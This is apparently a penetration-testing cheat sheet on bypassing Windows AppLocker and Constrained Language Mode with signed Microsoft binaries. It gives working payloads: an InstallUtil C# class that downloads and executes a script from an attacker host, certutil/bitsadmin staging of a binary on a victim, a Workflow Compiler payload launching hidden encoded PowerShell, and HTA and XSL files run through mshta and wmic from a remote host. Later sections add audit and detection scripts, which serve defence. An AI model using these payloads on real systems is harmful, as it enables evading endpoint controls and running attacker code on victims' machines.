# AppLocker Bypass

## AppLocker Bypass

* <https://github.com/api0cradle/UltimateAppLockerByPassList>
* <https://www.hackplayers.com/2018/12/english-cor-profilers-bypassing-windows.html>
* <https://0xdf.gitlab.io/2019/03/15/htb-ethereal-cor.html>
* <https://gitlab.com/0xdf/ctfscripts/tree/master/rev_shell_dll>
* <https://habr.com/ru/company/pt/blog/579516/>

### Enumeration

Check if there are any AppLocker rules:

```
PS > Get-AppLockerPolicy -Effective -Xml
PS > (Get-AppLockerPolicy -Local).RuleCollections
PS > Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2 -Recurse
```
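As an added example (not part of the original notes), the script below parses the effective policy returned by those commands and reports, for the signed Microsoft binaries this page relies on, whether a Deny rule or an exception names them or whether only the default `%WINDIR%\*` allow rule covers them. The binary list and the default-rule check are this example's own assumptions.

```powershell
# Added audit script, not part of the original notes. Reads the effective AppLocker
# policy and reports whether the binaries used on this page are explicitly blocked.
$lolbins = 'InstallUtil.exe', 'Microsoft.Workflow.Compiler.exe', 'MSBuild.exe',
           'mshta.exe', 'wmic.exe', 'bitsadmin.exe', 'certutil.exe'   # assumed list

[xml]$policy = Get-AppLockerPolicy -Effective -Xml

# Enforcement state of every rule collection (Exe, Dll, Script, Msi, Appx)
foreach ($rc in $policy.AppLockerPolicy.RuleCollection) {
    '{0,-6} collection: {1}' -f $rc.Type, $rc.EnforcementMode
}

$exe = $policy.AppLockerPolicy.RuleCollection | Where-Object { $_.Type -eq 'Exe' }
if (-not $exe) { Write-Warning 'No Exe rule collection: executables are not restricted.'; return }

# Paths / binary names that end up "not allowed": either a Deny rule or an
# exception carved out of an Allow rule.
$blocked = foreach ($rule in $exe.ChildNodes) {
    $conds = @()
    if ($rule.Action -eq 'Deny') { $conds += @($rule.Conditions.ChildNodes) }
    if ($rule.Exceptions)        { $conds += @($rule.Exceptions.ChildNodes) }
    foreach ($c in $conds) {
        if ($c.Path)           { $c.Path }                                   # FilePathCondition
        elseif ($c.BinaryName) { $c.BinaryName }                             # FilePublisherCondition
        elseif ($c.FileHash)   { $c.FileHash | ForEach-Object { $_.SourceFileName } }  # FileHashCondition
    }
}

# The default "All files located in the Windows folder" allow rule is what makes
# these binaries runnable in the first place.
$windirAllow = $exe.FilePathRule | Where-Object {
    $_.Action -eq 'Allow' -and $_.Conditions.FilePathCondition.Path -eq '%WINDIR%\*'
}
if ($windirAllow) { "Allow rule for %WINDIR%\* present: '$($windirAllow.Name)'" }

foreach ($bin in $lolbins) {
    $hit = $blocked | Where-Object { $_ -like "*$bin" -or $_ -eq $bin }
    if ($hit) { "[blocked] $bin  <- $($hit -join ', ')" }
    else      { "[allowed] $bin  (no Deny rule or exception names it)" }
}
```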

### InstallUtil

This combines an AppLocker bypass with a CLM (Constrained Language Mode) bypass: the PowerShell command runs inside a runspace hosted by the .NET assembly instead of in `powershell.exe`.

{% code title="BypassCLM.cs" %}

```csharp
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;

namespace BypassCLM
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("These aren't the droids you're looking for.");
        }
    }

    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            string cmd = "IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/run.txt')";
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();
            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;
            ps.AddScript(cmd);
            ps.Invoke();
            rs.Close();
        }
    }
}
```

{% endcode %}

{% hint style="info" %}
Before compiling, add a reference to the `System.Management.Automation` assembly from the GAC path:

```
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35
```

{% endhint %}

Upload and execute:

```
Attacker > certutil -encode C:\Users\snovvcrash\Bypass.exe bypass.txt
Victim > bitsadmin /transfer job1 http://10.10.13.37/bypass.txt C:\Windows\System32\spool\drivers\color\bypass.txt
Victim > certutil -decode C:\Windows\System32\spool\drivers\color\bypass.txt C:\Windows\System32\spool\drivers\color\bypass.exe && del C:\Windows\System32\spool\drivers\color\bypass.txt
Victim > C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\System32\spool\drivers\color\bypass.exe
```

### Microsoft.Workflow.Compiler.exe

```
PS > C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe info.xml payload.txt
```

{% code title="info.xml" %}

```xml
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>payload.txt</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
<generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
<includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
<linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
<tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
<warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
<win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<d2p1:checkTypes>false</d2p1:checkTypes>
<d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
<d2p1:compilerOptions i:nil="true" />
<d2p1:generateCCU>false</d2p1:generateCCU>
<d2p1:languageToUse>CSharp</d2p1:languageToUse>
<d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
<d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
<d2p1:mtInfo i:nil="true" />
<d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
</parameters>
</CompilerInput>
```

{% endcode %}

{% code title="payload.txt" %}

```csharp
using System;
using System.Diagnostics;
using System.Workflow.Activities;
 
public class Foo : SequentialWorkflowActivity {
      public Foo() {
          Process process = new Process();
          // Configure the process using the StartInfo properties.
          process.StartInfo.FileName = "powershell.exe";
          process.StartInfo.Arguments = "-WindowStyle Hidden -NoP -NoLogo -exec Bypass -enc <BASE64_PWSH_CMD>";
          process.StartInfo.WindowStyle = ProcessWindowStyle.Normal;
          process.Start();
          process.WaitForExit();
      }
}
```

{% endcode %}

### MSBuild

* <https://egre55.github.io/multi-stage-msbuild-applocker-bypass/>
* <https://github.com/Mr-Un1k0d3r/PowerLessShell>

### JScript and MSHTA

Full path to `.hta` file is required:

```
Cmd > mshta.exe \users\snovvcrash\cmd.hta
Cmd > mshta.exe http://10.10.13.37/cmd.hta
```

{% code title="cmd.hta" %}

```html
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
```

{% endcode %}

## WMIC

```
Cmd > wmic os get /format:"evil.xsl"
Cmd > wmic process get brief /format:"http://10.10.13.37/evil.xsl"
```

{% code title="evil.xsl" %}

```xml
<?xml version='1.0'?>
<stylesheet version="1.0"
xmlns="http://www.w3.org/1999/XSL/Transform"
xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
		<![CDATA[
			var r = new ActiveXObject("WScript.Shell");
			r.Run("powershell.exe -WindowStyle Hidden -NoP -NoLogo -exec Bypass -enc <BASE64_PWSH_CMD>");
		]]>
	</ms:script>
</stylesheet>
```

{% endcode %}
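The detection side of the techniques listed on this page, as an added example that is not part of the original notes: each regex covers one section above, `Test-LolbinCommandLine` returns the names of the rules a command line triggers, and the sample lines are constructed from the page's own invocations plus two benign lines that must not match. Rule names, patterns and the Sysmon query are this example's own.

```powershell
# Added detection example, not part of the original notes.
$rules = [ordered]@{
    'InstallUtil /U on an assembly outside Program Files'         = '(?i)\\InstallUtil\.exe.*\s/U\s+(?!"?C:\\Program Files)'
    'Microsoft.Workflow.Compiler.exe invoked (no interactive use)' = '(?i)\\Microsoft\.Workflow\.Compiler\.exe\s'
    'mshta.exe loading an HTA from a URL or a user path'            = '(?i)\bmshta(\.exe)?\s+("?https?://|"?\\?users\\|"?%temp%|"?C:\\Users)'
    'wmic /format: pointing at a URL or an explicit .xsl file'      = '(?i)\bwmic(\.exe)?\s.*/format:"?(https?://|[^"\s]*\.xsl)'
    'Encoded PowerShell with execution-policy bypass'               = '(?i)powershell(\.exe)?.*-exec\w*\s+bypass.*-enc'
}

# Returns the names of every rule whose pattern matches the given command line.
function Test-LolbinCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    foreach ($name in $rules.Keys) {
        if ($CommandLine -match $rules[$name]) { $name }
    }
}

# Constructed samples: the page's own invocations plus two benign lines (the last two).
$samples = @(
    'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\System32\spool\drivers\color\bypass.exe',
    'C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe info.xml payload.txt',
    'mshta.exe http://10.10.13.37/cmd.hta',
    'wmic process get brief /format:"http://10.10.13.37/evil.xsl"',
    'powershell.exe -WindowStyle Hidden -NoP -NoLogo -exec Bypass -enc QQBCAEMA',
    'wmic os get /format:list',
    'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U "C:\Program Files\Vendor\Service.exe"'
)
foreach ($s in $samples) {
    $hits = @(Test-LolbinCommandLine $s)
    if ($hits) { "ALERT  $s`n       -> $($hits -join '; ')" } else { "ok     $s" }
}

# Same check over live Sysmon process-creation events (Event ID 1), if Sysmon is installed:
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1} |
#   ForEach-Object { ([xml]$_.ToXml()).Event.EventData.Data |
#     Where-Object Name -eq 'CommandLine' | ForEach-Object { Test-LolbinCommandLine $_.'#text' } }
```

Security event 4688 carries the same `CommandLine` field once "Include command line in process creation events" is enabled, so the function works unchanged on that log as well.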
